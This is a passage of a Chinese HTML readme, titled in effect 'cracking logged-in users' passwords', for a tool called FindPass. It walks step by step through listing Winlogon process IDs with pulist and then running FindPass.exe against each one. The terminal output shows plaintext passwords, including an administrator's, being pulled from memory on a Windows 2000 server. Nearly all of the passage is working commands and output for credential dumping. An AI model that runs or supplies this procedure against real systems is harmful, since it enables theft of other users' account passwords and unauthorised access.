📄 findpass.readme.html

📁 破解已登陆用户密码
💻 HTML
📖 第 1 页 / 共 2 页
字号:
上一页 12
<font face="Fixedsys">*** </font></font><font face="Fixedsys" color="#80C050">4)  
用findpass与之前获得的相应信息获得各登陆会话的用户密码。</font><font face="Fixedsys"><br>        
</font><font face="Fixedsys"><font color="#80C050"></font>C:\Documents and Settings\bingle&gt;</font><font face="Fixedsys">FindPass.exe binglesite administrator 248<br>  
<br>  
         To Find Password in the Winlogon process<br>  
 Usage: FindPass.exe DomainName UserName PID-of-WinLogon<br>  
<br>  
The debug privilege has been added to PasswordReminder.<br>  
The WinLogon process id is 1128 (0x00000468).<br>  
 To find binglesite\administrator password in process 1128 ...<br>  
The encoded password is found at 0x007b0800 and has a length of 7.<br>  
The logon information is: binglesite/administrator/xxxxxxx.<br> 
The hash byte is: 0xf1.</font><font color="#80C050"><font face="Fixedsys"><br> 
*** got it</font></font><p style='line-height:160%'><font face="Fixedsys"><font color="#80C050"></font>C:\Documents and Settings\bingle&gt;</font><font face="Fixedsys">FindPass.exe  
binglesite bingle 1260<br>  
<br>  
         To Find Password in the Winlogon process<br>  
 Usage: FindPass.exe DomainName UserName PID-of-WinLogon<br>  
<br>  
The debug privilege has been added to PasswordReminder.<br>  
The WinLogon process id is 1260 (0x000004ec).<br>  
 To find binglesite\bingle password in process 1260 ...<br>  
The encoded password is found at 0x007b0800 and has a length of 6.<br> 
The logon information is: binglesite/bingle/bingle.<br> 
The hash byte is: 0xa9.<br>  
</font><font color="#80C050"><font face="Fixedsys">*** got it</font></font><font face="Fixedsys">        
<br>       
<br>       
<font color="#00CC00">(3) 只使用pulist<br>        
1) </font> pulist，找到系统里登陆的域名和用户名，及winlogon进程id&nbsp;<br>        
<font color="#00CC00">2) </font> 然后给每个winlogon进程id查找所有的用户。<br>        
<br>        
<font color="#80C050">*** 1) pulist，找到系统里登陆的域名和用户名，及winlogon进程id&nbsp;</font><br>        
C:\Documents and Settings\bingle>pulist&nbsp;<br>        
Process&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; PID&nbsp; User&nbsp;<br>       
Idle&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 0&nbsp;<br>       
System&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 8&nbsp;<br>       
smss.exe&nbsp;&nbsp;&nbsp;&nbsp; 164&nbsp; NT AUTHORITY\SYSTEM&nbsp;<br>        
csrss.exe&nbsp;&nbsp;&nbsp; 192&nbsp; NT AUTHORITY\SYSTEM&nbsp;<br>        
winlogon.exe      188&nbsp; NT AUTHORITY\SYSTEM&nbsp;<br>        
wins.exe&nbsp;&nbsp;&nbsp;&nbsp; 1212 NT AUTHORITY\SYSTEM&nbsp;<br>        
Explorer.exe      388&nbsp; TEST-2KSERVER\Administrator&nbsp;<br>       
internat.exe      1828 TEST-2KSERVER\Administrator&nbsp;<br>        
conime.exe&nbsp;&nbsp; 1868 TEST-2KSERVER\Administrator&nbsp;<br>        
msiexec.exe&nbsp; 1904 NT AUTHORITY\SYSTEM&nbsp;<br>        
tlntsvr.exe&nbsp; 1048 NT AUTHORITY\SYSTEM&nbsp;<br>        
taskmgr.exe&nbsp; 1752 TEST-2KSERVER\Administrator&nbsp;<br>        
csrss.exe&nbsp;&nbsp;&nbsp; 2056 NT AUTHORITY\SYSTEM&nbsp;<br>        
winlogon.exe      2416 NT AUTHORITY\SYSTEM&nbsp;<br>        
rdpclip.exe&nbsp; 2448 TEST-2KSERVER\clovea&nbsp;<br>        
Explorer.exe      2408 TEST-2KSERVER\clovea&nbsp;<br>        
internat.exe      1480 TEST-2KSERVER\clovea&nbsp;<br>        
cmd.exe&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 2508 TEST-2KSERVER\Administrator&nbsp;<br>        
ntshell.exe&nbsp; 368&nbsp; TEST-2KSERVER\Administrator&nbsp;<br>       
ntshell.exe&nbsp; 1548 TEST-2KSERVER\Administrator&nbsp;<br>        
ntshell.exe&nbsp; 1504 TEST-2KSERVER\Administrator&nbsp;<br>        
csrss.exe&nbsp;&nbsp;&nbsp; 1088 NT AUTHORITY\SYSTEM&nbsp;<br>        
winlogon.exe      1876 NT AUTHORITY\SYSTEM&nbsp;<br>        
rdpclip.exe&nbsp; 1680 TEST-2KSERVER\bingle&nbsp;<br>        
Explorer.exe      2244 TEST-2KSERVER\bingle&nbsp;<br>        
conime.exe&nbsp;&nbsp; 2288 TEST-2KSERVER\bingle&nbsp;<br>        
internat.exe      1592 TEST-2KSERVER\bingle&nbsp;<br>        
cmd.exe&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 1692 TEST-2KSERVER\bingle&nbsp;<br>        
mdm.exe&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 2476 TEST-2KSERVER\bingle&nbsp;<br>        
taskmgr.exe&nbsp; 752&nbsp; TEST-2KSERVER\bingle&nbsp;<br>       
pulist.exe&nbsp;&nbsp; 2532 TEST-2KSERVER\bingle&nbsp;<br>        
<br>        
<font color="#80C050">*** 2) 然后给每个winlogon进程id查找所有的用户。<br>         
</font>C:\Documents and Settings\bingle>D:\FindPass.exe TEST-2KSERVER&nbsp;<br>        
administrator 188&nbsp;<br>        
<br>        
         To Find Password in the Winlogon process&nbsp;<br>        
Usage: D:\FindPass.exe DomainName UserName PID-of-WinLogon&nbsp;<br>        
<br>        
The debug privilege has been added to PasswordReminder.&nbsp;<br>        
The WinLogon process id is 188 (0x000000bc).&nbsp;<br>        
To find TEST-2KSERVER\administrator password in process 188 ...&nbsp;<br>        
The encoded password is found at 0x008e0800 and has a length of 10.&nbsp;<br>        
The logon information is: TEST-2KSERVER/administrator/testserver.&nbsp;<br>        
The hash byte is: 0x13.&nbsp;<br>        
<font color="#80C050">*** 运气好，一下就找到一个。<br>         
</font><br>         
C:\Documents and Settings\bingle>D:\FindPass.exe TEST-2KSERVER&nbsp;<br>        
clovea 1876&nbsp;<br>        
<br>        
         To Find Password in the Winlogon process&nbsp;<br>        
Usage: D:\FindPass.exe DomainName UserName PID-of-WinLogon&nbsp;<br>        
<br>        
The debug privilege has been added to PasswordReminder.&nbsp;<br>        
The WinLogon process id is 1876 (0x00000754).&nbsp;<br>        
To find TEST-2KSERVER\clovea password in process 1876 ...&nbsp;<br>        
PasswordReminder is unable to find the password in memory.&nbsp;<br>        
<font color="#80C050">*** 看来这个winlogon不是这个用户的<br>         
</font><br>         
C:\Documents and Settings\bingle>D:\FindPass.exe TEST-2KSERVER&nbsp;<br>        
bingle 1876&nbsp;<br>        
<br>        
         To Find Password in the Winlogon process&nbsp;<br>        
Usage: D:\FindPass.exe DomainName UserName PID-of-WinLogon&nbsp;<br>        
<br>        
The debug privilege has been added to PasswordReminder.&nbsp;<br>        
The WinLogon process id is 1876 (0x00000754).&nbsp;<br>        
To find TEST-2KSERVER\bingle password in process 1876 ...&nbsp;<br>        
The logon information is: TEST-2KSERVER/bingle.&nbsp;<br>        
There is no password.&nbsp;<br>        
<font color="#80C050">*** 看来这个winlogon是这个用户的<br>         
</font><br>         
C:\Documents and Settings\bingle>D:\FindPass.exe TEST-2KSERVER&nbsp;<br>        
clovea 2416&nbsp;<br>        
<br>        
         To Find Password in the Winlogon process&nbsp;<br>        
Usage: D:\FindPass.exe DomainName UserName PID-of-WinLogon&nbsp;<br>        
<br>        
The debug privilege has been added to PasswordReminder.&nbsp;<br>        
The WinLogon process id is 2416 (0x00000970).&nbsp;<br>        
To find TEST-2KSERVER\clovea password in process 2416 ...&nbsp;<br>        
The logon information is: TEST-2KSERVER/clovea.&nbsp;<br>        
There is no password.&nbsp;<br>        
<font color="#80C050">*** 这个winlogon才是这个用户的<br>         
</font>C:\Documents and Settings\bingle>&nbsp;<br>        
</font>    
<p class=MsoNormal style='line-height:160%'>&nbsp;        
        
<hr size="1" noshade color="#FFFF00" width="90%">        
        
<p align="center"><font face="Fixedsys">与我联系：<a href="mailto:bingle@email.com.cn">bingle@email.com.cn</a>        
， 欢迎到<a href="bbs.html" target="_blank">我的留言簿</a></font></p>         
         
</body>         
         
</html>
上一页 12
💿 文件大小 107 K
👤 上传用户 zcmm_321
📂 所属分类其他
🏷️ 相关标签

#破解 #用户 #密码
⌨️ 快捷键说明

复制代码 Ctrl + C
搜索代码 Ctrl + F
全屏模式 F11
切换主题 Ctrl + Shift + D
显示快捷键 ?
增大字号 Ctrl + =
减小字号 Ctrl + -